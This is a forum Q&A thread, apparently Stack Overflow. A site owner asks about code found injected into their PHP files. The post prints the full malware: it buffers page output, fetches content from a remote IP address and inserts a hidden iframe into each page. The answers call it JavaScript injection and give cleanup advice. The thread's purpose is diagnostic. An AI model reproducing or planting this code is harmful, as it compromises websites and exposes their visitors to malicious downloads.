# Server Hack - Random Code added tot he top of PHP files

Tags: php

i found theses lines of code on some .PHP pages of mine.

```
<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>
```

anyone know anything about it?

Or at least tell me what it is doing...

Comment: Take your server offline right now: http://labs.sucuri.net/?details=82.200.204.151

Answer (score 7, accepted):

#### Update 09 / 11 / 2015

This is called JavaScript injection ([XSS](https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting)<sup>[1](https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting)</sup>), it happens when your server is hacked and an infection is spread.

This could for instance, promt a download window upon entering the website causing misleaded users to download possibly malicious software on their machine.

To get rid of it you'd best check all the files you have, scan your entire PC / maybe do a clean install. There are usually strange `<script>` tags in the files with some really freaky "*makes-no-sense*" JS in it - this is a good indication that your files have been injected with JS.

You'll also need to **find the leak** if you want to get rid of it permanently (or until they find new ways to XSS your site)

Here's another thing you can do to protect yourself against XSS: [CSP](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy)

---

*1 :: Cross Site Scripting*

Comment: im doing a full scan of my site files and removing the lines.

Comment: Then i will be scanning the rest of my sites to make sure it hasnt spread beyond this one site. thanks

Comment: No problem, if you found this helpful at all please mark the answer accepted, so people won't spend more time on this.